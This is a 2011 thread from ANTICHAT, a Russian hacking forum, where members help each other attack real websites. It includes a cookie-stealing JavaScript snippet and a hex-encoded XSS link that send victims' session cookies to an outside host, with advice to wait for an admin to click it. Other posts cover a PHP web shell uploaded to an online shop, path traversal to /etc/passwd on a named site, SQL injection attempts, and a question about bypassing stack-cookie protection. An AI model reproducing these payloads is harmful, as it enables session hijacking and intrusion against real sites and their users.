ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
12.08.2011, 14:09
|
|
Участник форума
Регистрация: 07.01.2009
Сообщений: 237
Провел на форуме:
745649
Репутация:
97
|
|
Пытаюсь эксплуатировать Stack Overflow в обычном strcpy(). Успешно переписал адрес возврата из функции, но перед возвратом вызывается проверка:
Код:
call __security_check_cookie
Есть ли способы её обойти?
Windows XP |
|
|
12.08.2011, 16:44
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от ridik77
winstrool, это как поставить где нибуть снифер? я зареган на hacker-pro, здесь есть такой ява скрипт-
img = new Image(); img.src = "http://httpz.ru/nypbi4u80f5.gif?"+document.cookie;
и есть ява скрипт для адресной строки- javascript:document.write('img = new Image(); img.src = "http://httpz.ru/nypbi4u80f5.gif?"+document.cookie;')
куда и как подставлять? куки должны сразу прейти или надо ждать?
в твоем случае в адресную строку следовательно и скрипт нужно для адресной строки, такжже чтоб сильно глаза не резало, переведи в хекс, прийдется подождать пока админ перейдет по ссылке...
P/S:вот подготовил код твоего снифака тебе остается подставить только название сайта:
Сообщение от None
ххх.com/?a=login&say=invalid_login&username=%22%3e%3c%73%6 3%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f% 63%61%74%69%6f%6e%3d%22%68%74%74%70%3a%2f%2f%68%74 %74%70%7a%2e%72%75%2f%6e%79%70%62%69%34%75%38%30%6 6%35%2e%67%69%66%3f%22%2b%64%6f%63%75%6d%65%6e%74% 2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e
|
|
|
|
12.08.2011, 17:23
|
|
Новичок
Регистрация: 09.08.2011
Сообщений: 5
Провел на форуме:
931
Репутация:
0
|
|
winstrool спасибо, ввел в адресною строку и поле Username: осталось а поле Password: исчезло.
и еще я вводил скрипт не помню какой но выскочило это: PHP SESSID= 0bd2283e6ef3fb5919658b34c3b460ec что это?
|
|
|
|
12.08.2011, 17:28
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от ridik77
winstrool спасибо, ввел в адресною строку и поле Username: осталось а поле Password: исчезло.
и еще я вводил скрипт не помню какой но выскочило это: PHP SESSID= 0bd2283e6ef3fb5919658b34c3b460ec что это?
Куки это. Обратись к стандартному мануалу по использованию XSS:
http://ha.ckers.org/xss.html
/showthread.php?t=42326
/thread20140.html
|
|
|
|
12.08.2011, 18:37
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186
Репутация:
2
|
|
Собсно такой вопрос... в шопе к продукту вместо pdf файла залил шелл
затем захожу в продукт и вижу свой файл мол shell.php, тыкаю по нему, мне вылазит мол сохранить файл.
Сылка скачки фала такого вида
http://site.com/getfile.php?id=346 можно ли как то определить где хранится сам файл что бы его выполнить?
|
|
|
|
12.08.2011, 19:06
|
|
Новичок
Регистрация: 11.07.2009
Сообщений: 3
Провел на форуме:
19069
Репутация:
0
|
|
http://www.multiplaz.ru/download//..%252f..%252f..%252f..%252f..%252f..%252f..%252f. .%252fetc/passwd
от этого можно получить что то большее? чем раскрытие путей
|
|
|
|
12.08.2011, 19:36
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от GroM88
Собсно такой вопрос... в шопе к продукту вместо pdf файла залил шелл
затем захожу в продукт и вижу свой файл мол shell.php, тыкаю по нему, мне вылазит мол сохранить файл.
Сылка скачки фала такого вида
http://site.com/getfile.php?id=346 можно ли как то определить где хранится сам файл что бы его выполнить?
Скорее всего в базе
|
|
|
|
12.08.2011, 21:20
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
Провел на форуме:
124363
Репутация:
11
|
|
погомогите плз!
собственно нашёл blind,но не могу раскрутить!
Код:
http://elecsnet.ru/search/?rid=23359
|
|
|
|
12.08.2011, 23:41
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от Faaax
погомогите плз!
собственно нашёл blind,но не могу раскрутить!
Код:
http://elecsnet.ru/search/?rid=23359
в каком месте тут скуль?
|
|
|
|
13.08.2011, 05:16
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
Провел на форуме:
0
Репутация:
0
|
|
Интересует такой вопрос в книге по безопасности php говорилось допустим у нас есть запрос на выбору
mysql_query ("SELECT * FROM user WHERE id='$id'");
$id = числу но можно подставить следующие при должно проверки
$id= 10 OR nick=ADMIN и запрос будет типа
mysql_query ("SELECT * FROM user WHERE id='10 OR nick=ADMIN'");
в вожу в адресной строке следующее
http://site.ru/user.php?id=10 or nick=ADMIN
почему не срабатывает? обработки id нету ибо я сам писал запрос
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
